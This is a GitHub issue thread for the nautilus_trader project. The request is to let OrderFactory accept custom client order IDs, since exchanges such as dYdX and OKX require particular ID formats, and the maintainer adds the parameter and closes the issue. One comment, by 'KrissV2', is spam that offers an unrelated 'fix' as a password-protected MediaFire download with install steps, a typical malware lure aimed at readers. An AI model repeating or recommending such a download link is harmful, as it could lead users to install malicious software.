### ISSUE TITLE
Support for custom client order IDs for OrderFactory

### ISSUE THREAD

**Issue by miller-moore** [nautechsystems/nautilus_trader#1884]
# Feature Request

This is a feature request to add `client_order_id` as an optional parameter to `OrderFactory`, falling back to the current `UUID4` behavior if left `None` and perhaps also adding support to register a custom client order id generator in `OrderFactory` that would be then be invoked in factory methods if the `client_order_id` is `None` while the custom generator is not `None`. The reason for this request is that not all exchanges accept UUID4 client order id's. For example, [dYdX requires client order id's (`client_id`) to be integers](https://docs.dydx.exchange/api_integration-clients/validator_client#placing-an-order) and [OKX requires client order id's (`clOrdId`) to be alphanumerics only up to 32 characters](https://www.okx.com/docs-v5/en/#order-book-trading-trade-post-place-order).

**Comment by cjdsellers** [comment]
Hi @miller-moore

Thanks for the description.

I think the fastest path here is to add an optional `client_order_id` param for the order factory creation methods, then the strategy can handle this. Later on a more comprehensive feature would be the custom generators.

This change will also help the dYdX integration CC @davidsblom.

By the way, the default Nautilus `ClientOrderId` isn't actually a UUID4 but a string with an `O-` prefix followed by a datetime component then some numerical tags with some hyphens thrown in.

Providing a UUID4 generator could be a good example of a custom generator though too (I know some venues even use UUID4's for web GUI orders).

I've assigned this to me because I can also bundle this with a couple of other small tweaks to the order factory coming up, should be done within a week or so.

**Comment by miller-moore** [comment]
Oops, thanks for the clarification!

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by cjdsellers** [comment]
Now added the custom `client_order_id` params from commit ba9c00158e3b187c7264f512a985028658d5e548 to `develop` branch, and will be in the next release.

I'd prefer to add the custom generator registration once we get to that point in Rust. Otherwise, somebody else is free to pick that up :pray:. Closing this for now.

**Comment by davidsblom** [comment]
This is great! Many thanks. I’ll update the dydx adapter to use this by default and fall back to using the cache if the client order id cannot be casted to an integer.
